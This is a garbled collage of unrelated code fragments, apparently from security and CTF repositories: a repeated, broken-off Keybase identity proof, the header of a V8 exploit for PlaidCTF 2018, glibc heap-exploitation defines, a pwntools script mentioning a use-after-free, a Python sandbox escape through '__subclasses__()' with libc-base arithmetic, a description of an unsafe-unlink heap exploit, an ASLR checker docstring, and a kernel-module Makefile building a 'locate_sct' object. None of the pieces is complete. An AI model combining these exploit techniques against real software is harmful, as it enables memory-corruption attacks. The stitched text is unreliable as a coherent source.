I hereby claim:
- I am ducphanduyagentp on github.
- I am dphan0x80 (https://keybase.io/dphan0x80) on keybase.
- I have a public key whose fingerprint is 3796 106E F244 F6C6 EE39 09B3 07A6 7A8D 5C67 96C2
To claim this, I am signing this object:
//
// Quick and dirty exploit for the "roll a d8" challenge of PlaidCTF 2018.
// N-day exploit for https://chromium.googlesource.com/v8/v8/+/b5da57a06de8791693c248b7aafc734861a3785d
//
// Scroll down to "BEGIN EXPLOIT" to skip the utility functions.
//
// Copyright (c) 2018 Samuel Groß
//
//
I hereby claim:
To claim this, I am signing this object:
#include <stdio.h>
#include <stdlib.h>
/* Two fixed sizes used by the code further down (not visible in this excerpt);
 * presumably the real and the crafted chunk sizes -- confirm against the rest
 * of the file before changing either. */
#define chunksize 0x8
#define fakesize 0x20
/* Same definitions glibc malloc uses internally for its size word and the
 * alignment mask; 2*SIZE_SZ - 1 assumes the usual 16-byte alignment on
 * 64-bit, so check the target libc if it differs. */
#define SIZE_SZ (sizeof(size_t))
#define MALLOC_ALIGN_MASK (2*SIZE_SZ - 1)
/* NOTE(review): glibc's own MIN_CHUNK_SIZE is 4*SIZE_SZ (32 on 64-bit, 16 on
 * 32-bit), so the 24/12 here is a different quantity -- confirm what size is
 * meant before relying on it elsewhere. */
#define MIN_CHUNK_SIZE 24 /* 64 bit system */
//#define MIN_CHUNK_SIZE 12 /* 32 bit system */
#!/usr/bin/env python | |
#-*- coding: utf-8 -*- | |
from pwn import * | |
import re | |
import sys | |
import string | |
import itertools | |
# UAF in IndexCursor |
# import Collection | |
# Rebind the module-level name `bytearray` to the type found at position 5 of
# object's subclass list (() -> tuple -> object -> __subclasses__()), rather
# than using the builtin name directly -- presumably the builtin is not
# reachable in the environment this targets (TODO confirm).
# NOTE(review): the position in __subclasses__() depends on the interpreter
# build and on what has already been imported, so index 5 is not portable.
bytearray = ().__class__.__base__.__subclasses__()[5]
def p64(addr):
    """Pack *addr* as an 8-byte little-endian bytearray.

    The integer is rendered as 16 hex digits, parsed into big-endian bytes
    and then reversed, so only the bytearray type is needed (no struct).
    Values outside 0..2**64-1 are not rejected: negatives fail in fromhex
    and larger values produce more than 8 bytes.
    """
    big_endian = bytearray.fromhex('%016x' % addr)
    return big_endian[::-1]
# NOTE(review): `Collection` is used here but the only import of it above is
# commented out, so this line only works where the module is already in scope.
b = Collection.Collection({'1':0x1337})
# Derive the libc base from the object's address (CPython's id() is the
# address). Both constants are offsets that only hold for one specific
# build and memory layout -- TODO confirm against the target before reuse.
libc_base = id(b) + 0xe27198 - 0x13e0dd0
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
# The 300 challenge was a heap challenge that allowed you to make allocations of size 0x300.
# You could free allocations and still read from and write to them after they had been freed.
# The tricky part of the challenge was that you don't control the size, so you can't, for example, use the usual fastbin techniques.
# This exploit overwrites the check_action variable so that the libc no longer aborts on errors.
# Afterwards we can get a write-what-where primitive using unsafe unlink.
'''checkaslr.py: Check for files that opt into ASLR with /DYNAMICBASE
but do not have the relocation table that ASLR needs in order to function.
usage: checkaslr.py <dir>
ex: checkaslr.py "C:\Program Files\"
requires: pefile <https://github.com/erocarrera/pefile>, which should be
installable via: pip install pefile
'''
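# Out-of-tree kbuild Makefile: builds afw.ko from the objects in afw-objs
# by delegating to the kernel's own build system.
obj-m += afw.o
afw-objs := afw_main.o locate_sct.o ttgl.o
ccflags-y := -std=gnu99 -O2

# Kernel build directory; override on the command line to build against a
# different kernel (make KDIR=/path/to/kernel/build).
KDIR ?= /lib/modules/$(shell uname -r)/build

# Neither target produces a file of that name; mark them phony so they always run.
.PHONY: all clean

# $(MAKE) instead of a bare `make` so flags such as -j and -n propagate to the
# sub-make; $(CURDIR) is set by make itself, unlike $(PWD), which only exists
# when inherited from a shell.
all:
	$(MAKE) -C $(KDIR) M=$(CURDIR) modules

clean:
	$(MAKE) -C $(KDIR) M=$(CURDIR) clean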
#!/usr/bin/env python
#
# Copyright (c) 2012, Chema Garcia
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or
# without modification, are permitted provided that the following
# conditions are met:
#
# * Redistributions of source code must retain the above